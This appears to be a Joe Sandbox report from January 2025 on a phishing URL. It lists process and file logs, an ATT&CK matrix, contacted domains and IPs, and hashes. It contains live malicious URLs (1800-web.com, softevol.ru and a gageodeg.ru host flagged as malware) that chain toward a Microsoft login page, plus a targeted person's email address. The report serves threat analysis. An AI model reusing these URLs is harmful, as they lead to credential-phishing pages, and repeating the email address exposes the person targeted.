Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru/3671221770088554468995aJnxdglUKIEAPHRQJZVOEQDFDAWGIPHZAASEPLGEBBLDIFXAXHTEXGROCEYQWNX100%Avira URL Cloudmalware
https://1800-web.com/favicon.ico0%Avira URL Cloudsafe
https://a89.softevol.ru/favicon.ico0%Avira URL Cloudsafe
https://a89.softevol.ru/5fsy/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
1800-web.com
124.217.248.8
truetrue
    unknown
    s-part-0016.t-0009.t-msedge.net
    13.107.246.44
    truefalse
      high
      a89.softevol.ru
      172.67.147.10
      truetrue
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          code.jquery.com
          151.101.194.137
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              high
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru
                104.21.96.1
                truefalse
                  unknown
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    sni1gl.wpc.omegacdn.net
                    152.199.21.175
                    truefalse
                      high
                      www.google.com
                      142.250.186.36
                      truefalse
                        high
                        www.office.com
                        unknown
                        unknownfalse
                          high
                          identity.nel.measure.office.net
                          unknown
                          unknownfalse
                            high
                            aadcdn.msftauth.net
                            unknown
                            unknownfalse
                              high
                              login.microsoftonline.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://a89.softevol.ru/favicon.icofalse
                                • Avira URL Cloud: safe
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8fffc2a2e94d0f6c/1736544544929/cad4417f5e26610e9e3d5789d1dbb4a5b0d68b624696dd5fe371275521076928/ULoxfGrs8uTzRfHfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                    high
                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                      high
                                      https://a89.softevol.ru/5fsy/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnGfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/false
                                            high
                                            https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fffc2a2e94d0f6c&lang=autofalse
                                                high
                                                https://1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=false
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8fffc2a2e94d0f6c/1736544544923/lbf-aarKlszHGWEfalse
                                                    high
                                                    https://a89.softevol.ru/5fsy/#Xleon.graves@atos.netfalse
                                                      unknown
                                                      https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                        high
                                                        https://itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru/3671221770088554468995aJnxdglUKIEAPHRQJZVOEQDFDAWGIPHZAASEPLGEBBLDIFXAXHTEXGROCEYQWNXfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://a.nel.cloudflare.com/report/v4?s=L%2Fki3fnwNHqhvJN2WWZF4CvLsUqc%2FdQjsaVfqhMLoUE%2BVGKuBxmpANntayqzTPNDzxT5od6xcgxIHZgrpGu9cdifB7Y6ULH9zMviuQWBsZavNtUJVnllEK1MNLqo%2BQ%3D%3Dfalse
                                                          high
                                                          https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721413577217674.NWJlMmNhMGQtN2QyMy00MjQxLTkzNmMtM2U5MTA3OWMwZmMwNTQ2YTdhNDgtNzJiZS00MmQ4LWE1NWUtODg0NTJkNjZlMzRk&ui_locales=en-US&mkt=en-US&client-request-id=63f9efb5-c87a-449c-9957-b42c82c9fc23&state=EtHrmnnVxWNpXdWk1Iwmh-NW7Uip9MZudc2gAHgdJQHqpvkUE85lr2sspSGWH8Dx4rhhfpOlFKL5BocOlmJsx4s9VMnv3Fih3Bym4x1ehkJCOnRqVroGVTIhPPYTMQBNDKsZx6QLYjLGGCK7bqiQ8eJWCwDTMv9_Jv-lg9Z8nr-Pz8TEFE09Ss2hGUWnD4KtLilP35yJGNwNcw6TQHKAEdZ4GsQhvchPjYOhUhpWsAgSS7ntOLneuzYaqx3NxeJZHWQzsZGFuFN8B2jtaIDz4w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                            high
                                                            https://1800-web.com/favicon.icofalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://login.microsoftonline.comchromecache_89.2.dr, chromecache_100.2.drfalse
                                                              high
                                                              https://login.windows-ppe.netchromecache_89.2.dr, chromecache_100.2.drfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                104.18.94.41
                                                                challenges.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                151.101.130.137
                                                                unknownUnited States
                                                                54113FASTLYUSfalse
                                                                104.21.96.1
                                                                itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ruUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                172.67.147.10
                                                                a89.softevol.ruUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                151.101.194.137
                                                                code.jquery.comUnited States
                                                                54113FASTLYUSfalse
                                                                35.190.80.1
                                                                a.nel.cloudflare.comUnited States
                                                                15169GOOGLEUSfalse
                                                                124.217.248.8
                                                                1800-web.comMalaysia
                                                                45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue
                                                                104.17.24.14
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                104.21.16.1
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.186.36
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                239.255.255.250
                                                                unknownReserved
                                                                unknownunknownfalse
                                                                104.17.25.14
                                                                cdnjs.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                IP
                                                                192.168.2.8
                                                                192.168.2.4
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1588256
                                                                Start date and time:2025-01-10 22:27:50 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 3m 18s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:browseurl.jbs
                                                                Sample URL:http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:10
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal56.win@22/76@40/14
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 142.250.185.67, 172.217.23.110, 142.250.110.84, 142.250.181.238, 142.250.186.46, 172.217.18.110, 199.232.214.172, 192.229.221.95, 216.58.206.46, 142.250.186.174, 172.217.18.14, 40.126.32.140, 40.126.32.74, 20.190.160.20, 40.126.32.68, 40.126.32.138, 20.190.160.17, 40.126.32.133, 20.190.160.14, 13.107.6.156, 40.126.31.71, 20.190.159.0, 40.126.31.73, 20.190.159.2, 40.126.31.67, 20.190.159.71, 20.190.159.64, 20.190.159.23, 40.126.32.134, 40.126.32.136, 142.250.186.74, 172.217.23.106, 172.217.18.106, 142.250.184.202, 142.250.185.74, 172.217.18.10, 216.58.206.74, 142.250.185.138, 142.250.74.202, 216.58.206.42, 142.250.184.234, 142.250.186.42, 172.217.16.202, 172.217.16.138, 142.250.186.138, 142.250.185.106, 20.50.201.195, 142.250.186.110, 13.69.116.104, 216.58.206.78, 20.190.160.22, 142.250.186.163, 142.250.185.174, 2.19.126.200, 2.19.126.199, 88.221.110.91, 2.23.242.162, 172.202.163.200, 23.206.229.226, 13.107.246.45, 13.107.246.44
                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, onedscolprdweu01.westeurope.cloudapp.azure.com, login.mso.msidentity.com, onedscolprdweu06.westeurope.cloudapp.azure.com, www.bing.com, www.tm.ak.prd.aadg.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, www.tm.ak.prd.aadg.akadns.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanage
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=
                                                                No simulations
                                                                No context
                                                                No context
                                                                No context
                                                                No context
                                                                No context
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 20:28:53 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.9894029556143584
                                                                Encrypted:false
                                                                SSDEEP:48:8MN0dUTYwsuHzidAKZdA1oehwiZUklqehsJy+3:8MvnIBJy
                                                                MD5:49B429AF28611E9C4DD1497AA7EA86AE
                                                                SHA1:8E1A1BB862D4959901A38DCE86847AF81DFDD294
                                                                SHA-256:513380B37F1DBB3576A3DBA0D2532BCF84BA5FDDDAF153EA9335CF67B26F47AB
                                                                SHA-512:78B70532E63ACED64F6E3BF2DAFF971C219428343E4FED7F3C2DF67D7A1C9A75FACF0B8D0567667C42A7A27E36F6DCE86E335A74C622479B74900E0CFD9C2073
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,....:...c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I*Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............v......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 20:28:53 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2679
                                                                Entropy (8bit):4.005951481695053
                                                                Encrypted:false
                                                                SSDEEP:48:820dUTYwsuHzidAKZdA1leh/iZUkAQkqehxJy+2:82vni9Q+Jy
                                                                MD5:13467CA604DCF9C77D2D8C5649C241B5
                                                                SHA1:6BF1EA45437FC750DC16F57FBB7F468F39842D13
                                                                SHA-256:746837C4CA1553A80C379350816DC77D28622BEA35DD07D75B0DCC9BB798B428
                                                                SHA-512:45589DC7791DDEF3D2A9D537C77AF35B4463C0B4B988EC619F561FD8BE6354B9F18FC29258C03432614BE20C846721AE5C6700B4C23C811CCE811BED59EB5426
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,........c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I*Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............v......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2693
                                                                Entropy (8bit):4.01393855545084
                                                                Encrypted:false
                                                                SSDEEP:48:8V0dUTYwbHzidAKZdA14t5eh7sFiZUkmgqeh7srJy+BX:8VvnSndJy
                                                                MD5:7B493BFB3049DA9A97A668614EB2FAAB
                                                                SHA1:0BD8269542F511EBB23812D8EE6BBE5395B946F8
                                                                SHA-256:70C8CDC55D11458734518B256A1D54ACB551FCD7155FB25C2A0792511BC80742
                                                                SHA-512:3B882459336134BD87EAA92AEBD4EDE715452007F2C842E3DDF8C48DCBBF220013F7EFB7D68B1EE5029C3B0DDC43C9BE0997F0BCAD29DD9C6E0042DEDFA4367E
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I*Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............v......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 20:28:53 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2681
                                                                Entropy (8bit):4.004715087910295
                                                                Encrypted:false
                                                                SSDEEP:48:8U0dUTYwsuHzidAKZdA16ehDiZUkwqeh1Jy+R:8Uvn5jJy
                                                                MD5:C97623A0094C4AFCD78DAA8E43553F3B
                                                                SHA1:726691BD31DA80593018C8EDA97D433BA10B2C70
                                                                SHA-256:E4DFD856B43DCB4C47C09679F4CA08DBFD53345F2D6ABD4ED744C8A8368F63F3
                                                                SHA-512:0E8B0F2A2B7AE6FC07BADDFBC375CF449DB0DEA010CC1EA2B9460A0686CA0DC9226E1004EFA3EA00A961B511EC78A95E2F9C58AE5FB1D0D7C8DAE41C67B9D0C1
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,........c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I*Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............v......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 20:28:53 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2681
                                                                Entropy (8bit):3.9934096975255664
                                                                Encrypted:false
                                                                SSDEEP:48:8F0dUTYwsuHzidAKZdA1UehBiZUk1W1qehnJy+C:8Fvnp9HJy
                                                                MD5:26D5954AAEF54C29CDDBC230977FAB3F
                                                                SHA1:1F1DC042F8504A51A108442CEA9624EA4F50C504
                                                                SHA-256:330819D82EA25A291095DEF4BBBD7C697698F17CEEF3C13EB8D29555850C03BF
                                                                SHA-512:04F5AF0EC69D4CD5F56D40755BC18F760BAA49027DEB55CEE187B266064DBD708CE1C0804E549CE6857B91D0B132AE8ED7A5248C53E8381297E476A0D9C8C486
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,........c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I*Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............v......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 20:28:53 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2683
                                                                Entropy (8bit):4.004310779001178
                                                                Encrypted:false
                                                                SSDEEP:48:8U0dUTYwsuHzidAKZdA1duTrehOuTbbiZUk5OjqehOuTbdJy+yT+:8UvnWTYTbxWOvTbdJy7T
                                                                MD5:7B596624BE32C75656A121EBED8A6990
                                                                SHA1:05EFBABD0E6E2A32D1276576164CD1D804DC1CA4
                                                                SHA-256:CB04B498FBCFA25FB1382307A8E7DA93EA059FC868F727D03ADDB2D45836933E
                                                                SHA-512:A78F8ABA5C57D6B5501C453585CB68880A4BA3F4DFAAB2CEA90A02B0E8531E1CA7DEB5C72CE31EBC0592D7C2E0F69E1D39FA313345231ECB2B2B09947C7AA0FD
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,........c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I*Z......B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............v......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):3452
                                                                Entropy (8bit):5.117912766689607
                                                                Encrypted:false
